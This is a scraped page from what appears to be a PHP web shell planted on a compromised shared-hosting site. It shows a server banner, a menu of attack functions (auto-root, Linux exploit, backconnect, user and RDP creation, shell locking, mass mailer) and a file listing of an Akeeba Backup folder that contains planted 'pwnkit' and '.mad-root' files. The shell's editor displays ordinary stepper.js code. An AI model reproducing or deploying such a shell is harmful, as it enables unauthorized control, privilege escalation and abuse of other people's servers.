Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
media /
com_akeeba /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Ajax.min.js
3.05
KB
-rw----r--
Alice.min.js
3.09
KB
-rw----r--
Backup.min.js
9.83
KB
-rw----r--
Configuration.min.js
31.11
KB
-rw----r--
ConfigurationWizard.min.js
7.33
KB
-rw----r--
ControlPanel.min.js
927
B
-rw----r--
DatabaseFilters.min.js
6.21
KB
-rw----r--
FileFilters.min.js
13.6
KB
-rw----r--
IncludeFolders.min.js
5.9
KB
-rw----r--
Manage.min.js
895
B
-rw----r--
Modal.min.js
4.3
KB
-rw----r--
MultipleDatabases.min.js
7.66
KB
-rw----r--
RegExDatabaseFilters.min.js
4.96
KB
-rw----r--
RegExFileFilter.min.js
5.13
KB
-rw----r--
Restore.min.js
4.5
KB
-rw----r--
Stepper.min.js
2.88
KB
-rw----r--
System.min.js
7.68
KB
-rw----r--
Tooltip.min.js
3.32
KB
-rw----r--
Transfer.min.js
11.35
KB
-rw----r--
UserInterfaceCommon.min.js
6.01
KB
-rw----r--
akeebaui.js
529
B
-rw----r--
akeebauipro.js
6.96
KB
-rw----r--
alice.js
4.45
KB
-rw----r--
backup.js
14.07
KB
-rw----r--
configuration.js
48.18
KB
-rw----r--
confwiz.js
11.23
KB
-rw----r--
dbef.js
13.02
KB
-rw----r--
eff.js
14.92
KB
-rw----r--
encryption.js
19.06
KB
-rw----r--
fsfilter.js
27.09
KB
-rw----r--
gui-helpers.js
21.69
KB
-rw----r--
multidb.js
16.48
KB
-rw----r--
piecon.min.js
2.22
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
regexdbfilter.js
11.22
KB
-rw----r--
regexfsfilter.js
11.08
KB
-rw----r--
restore.js
6.5
KB
-rw----r--
stepper.js
4.1
KB
-rw----r--
system.js
23.35
KB
-rw----r--
transfer.js
24.85
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stepper.js
/** * Akeeba Backup * * @package akeeba * @copyright Copyright (c)2009-2016 Nicholas K. Dionysopoulos * @license GNU GPL version 3 or, at your option, any later version **/ if(typeof(akeeba) == 'undefined') { var akeeba = {}; } if(typeof(akeeba.jQuery) == 'undefined') { akeeba.jQuery = jQuery.noConflict(); } var AkeebaStepper = function(options){ this.options = { /* Element definition */ holder : '#stepper-holder', loading : '#stepper-loading', pane : '#stepper-progress-pane', content : '#stepper-progress-content', steps : '#stepper-steps', status : '#stepper-status', step : '#stepper-step', substep : '#stepper-substep', percentage : '#stepper-percentage', timer : '#response-timer', useIframe : false, domainUrl : 'view=alices&task=domains', pollingUrl : 'view=alices&task=ajax', /* Event hooks */ onBeforeStart : function(polling){}, onBeforeStep : function(polling, previousResult){}, onComplete : function(result){} }; this.options = akeeba.jQuery.extend(this.options, options || {}); // Private members var that = this; var akeebaUrl = 'index.php?option=com_akeeba&tmpl=component&'; var pollingObj = { cache : false, data : {}, dataType : 'text', success : function(data){ var match = new RegExp('###(.*?)###').exec(data); var result = JSON.parse(match[1]); that.renderBars(result.Domain); akeeba.jQuery(that.options.percentage + ' div.bar').css({'width':result.Progress+'%'}); akeeba.jQuery(that.options.step).html(result.Step); akeeba.jQuery(that.options.substep).html(result.Substep); if(result.HasRun == 1){ that.complete(result); } else{ setTimeout(function(){that.step(result)}, 10); } } }; // Private functions var getDomains = function(){ akeeba.jQuery.ajax(akeebaUrl + that.options.domainUrl, { cache : false, dataType : 'text', beforeSend : function(){ akeeba.jQuery(that.options.loading).show(); }, success : function(data){ var match = new RegExp('###(.*?)###').exec(data); that.domains = JSON.parse(match[1]); akeeba.jQuery(that.options.loading).hide(); akeeba.jQuery(that.options.pane).show('fast'); that.continueAfterLoad(); } }) }; var startTimeout = function(){ var lastResponseSeconds = 0; akeeba.jQuery(that.options.timer + ' div.text').everyTime(1000, 'lastReponse', function(){ lastResponseSeconds++; var lastText = akeeba_translations['UI-LASTRESPONSE'].replace('%s', lastResponseSeconds.toFixed(0)); akeeba.jQuery(that.options.timer + ' div.text').html(lastText); }); }; var resetTimeout = function(){ akeeba.jQuery(that.options.timer + ' div.text').stopTime().html(akeeba_translations['UI-LASTRESPONSE'].replace('%s', '0')); }; // Public functions this.init = function(){ getDomains(); }; this.continueAfterLoad = function(){ this.renderBars(); startTimeout(); this.start(); }; this.renderBars = function(active_step){ if(active_step == undefined) active_step = ''; var normal_class = 'label-success'; var this_class = ''; //if( active_step == '' ) normal_class = ''; akeeba.jQuery(this.options.steps).html(''); akeeba.jQuery.each(this.domains, function(counter, element){ var step = akeeba.jQuery(document.createElement('div')) .addClass('label') .html(element[1]) .data('domain',element[0]) .appendTo(that.options.steps); if(element[0] == active_step ){ normal_class = ''; this_class = 'label-info'; } else{ this_class = normal_class; } step.addClass(this_class); }); }; this.start = function(){ this.options.onBeforeStart(pollingObj); pollingObj.data.ajax = 'start'; akeeba.jQuery.ajax(akeebaUrl + this.options.pollingUrl, pollingObj); }; this.step = function(previousResult){ this.options.onBeforeStep(pollingObj, previousResult); resetTimeout(); startTimeout(); pollingObj.data.ajax = 'step'; akeeba.jQuery.ajax(akeebaUrl + this.options.pollingUrl, pollingObj); }; this.complete = function(result){ resetTimeout(); this.options.onComplete(result); }; };
Close